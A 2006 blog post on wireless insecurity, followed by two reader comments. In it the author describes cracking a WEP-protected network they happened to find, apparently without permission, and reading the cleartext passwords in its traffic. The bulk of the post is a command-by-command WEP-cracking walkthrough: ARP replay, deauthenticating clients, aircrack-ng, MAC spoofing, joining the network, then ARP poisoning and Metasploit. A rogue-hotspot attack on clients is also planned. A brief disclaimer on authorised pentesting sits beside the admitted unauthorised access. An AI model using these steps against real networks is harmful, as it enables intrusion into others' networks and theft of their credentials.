Wireless insecurity.
Blogged on 30th August 2006 at 16:47:30 in Security
I'm sure most people who read this will know that WEP is crap. I had a few minutes spare today and to make use of my Linksys WUSB54G adapter that I bought months ago for wireless pentesting.

After downloading some patched rt2750 drivers and I had packet injection working. It took me 14 minutes from start to finish to find a wireless network using WEP and connect myself to it. The captured data I could decrypt with the cracked WEP key and load in to wireshark. Cleartext passwords everywhere!

The next task is to research in to attacking wireless clients directly. Looking at airodump-ng, there's so many machines probing for hotspots such as iZone. All I need to do is turn my laptop in to a hotspot and trick the clients in to connecting. Projects already exist for this, such as hotspotter.

Disclaimer: Breaking in to computers and networks is illegal. Don't do it unless you've been authorised to do so (i.e. you're conducting a pentest for a client).

The process to crack an access point from start to finish, in about 14 minutes is as follows:


  • Run airomon-ng:

    # airmon-ng start rausb0

  • Run airodump-ng to find networks:

    # airodump-ng rausb0

  • Kill airodump-ng and turn off channel hoping to focus on the network of interest:

    # airodump -w out --channel 6 rausb0

  • Look for clients associated with the BSSID in airodump output.

  • Use ARP replay attack to increase data packets to get weak IVs from the AP:

    # aireplay -3 -b <bssid of ap> -h <mac of client> rausb0

  • If an ARP replay attack doesn't find any ARP requests and there are clients on the network, can use aireplay-ng to force clients to disconnect. Most OS' will then try to connect again, thus sending out an ARP request which can be captured and replayed.

  • Wait until data captured increases enough to use aircrack-ng to crack key (20,000+ in most cases).

  • Crack the key with:

    # aircrack-ng out-01.cap

  • If MAC filter is turned on, fake wireless adapter MAC with one of the clients (can use aireplay to disconnect the client):

    # ifconfig rausb0 down

    # macchanger -m <fake MAC> rausb0

    # ifconfig rausb0 up

  • Associate with the network:
    # iwconfig rausb0 mode managed key <key>

    # iwconfig rausb0 ap <bssid of ap>

    # iwconfig rausb0 essid <ssid> [optional]

  • Configure IP address manually or with DHCP:
    # dhclient rausb0

  • Try to ping the default gateway to see if there is IP connectivity and start more pentesting (such as ARP poisoning/spoofing to sniff on switched networks, nmap and get Metasploit running).
Leave a comment
del.icio.us | digg it! | Google bookmarks | slashdot it!

Comments
Comment by Temporo on 7th September 2006 at 13:09:05
I wanna have a go at doing this when i have a *nix and a wireless card/adapter.

T.
 
Comment by Tim on 1st December 2006 at 18:40:08
Looking for a bit of info on the arp replay, if I am faking the assoc with the AP how the hell does aireplay-ng find a packet sent from my faked client to replay, surelly this arp request should be encrypted so how the hell does my wireless card with a faked client generate this request to begin with.

Really bugging me: is it a specialised chopchop attack in aireplay -3 that somehow generates the correct IV from a weak IV sent by the AP, from time to time have to wait a while before this ARP packet is generated with a faked client.